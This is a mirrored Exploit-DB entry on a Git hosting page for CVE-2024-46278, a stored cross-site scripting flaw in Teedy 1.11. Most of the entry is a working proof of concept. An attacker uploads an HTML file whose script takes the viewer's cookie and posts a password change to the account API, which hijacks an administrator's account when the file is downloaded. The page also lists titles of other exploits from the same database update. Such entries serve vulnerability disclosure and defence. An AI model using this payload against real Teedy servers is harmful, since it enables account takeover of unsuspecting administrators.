bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52228.txt
Exploit-DB 7ebfc36557 DB: 2025-04-17 
24 changes to exploits/shellcodes/ghdb

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)

Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account

Dell EMC iDRAC7/iDRAC8 2.52.52.52 -  Remote Code Execution (RCE)

FLIR AX8 1.46.16  - Remote Command Injection

ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)

Ethercreative Logs 3.0.3 - Path Traversal

Garage Management System 1.0 (categoriesName) - Stored XSS

Nagios Log Server 2024R1.3.1 - Stored XSS

ProConf 6.0 -  Insecure Direct Object Reference (IDOR)

Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)

WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php)  - File Write DoS
ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS
ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution

Car Rental Project 1.0 - Remote Code Execution

KodExplorer 4.52 - Open Redirect

NagVis 1.9.33 - Arbitrary File Read
phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames

Smart Manager 8.27.0 - Post-Authenticated SQL Injection

Zabbix 7.0.0 - SQL Injection

Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)

Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass

WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
2025-04-17 00:16:29 +00:00

56 lines
No EOL
2 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
# Vendor Homepage: https://teedy.io/
# Software Link: https://github.com/Tomblib0/Teedy
# Version: 1.11
# Tested on: Linux
# CVE : CVE-2024-46278
There is a vulnerability that causes XSS when downloading files.
XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.
Login as an attackers account.
Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.
```
<script>
const currentCookie = document.cookie;
const requestOptions = {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'application/json, text/plain, */*',
'Cookie': currentCookie,
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
'sec-ch-ua-platform': '"Linux"',
'Origin': 'http://localhost:8080',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'http://localhost:8080/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9'
},
body: 'password=superSecure2&passwordconfirm=superSecure2'
};
fetch('http://localhost:8080/api/user', requestOptions)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok');
}
document.write('<h1>Your account was taken over by the attacker LOL</h1>');
return response.json();
})
.then(data => console.log(data))
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
```
Login with another account. eg. admin
Click on the file uploaded by the attacker and select Download this file.
Reference in a new issue View git blame Copy permalink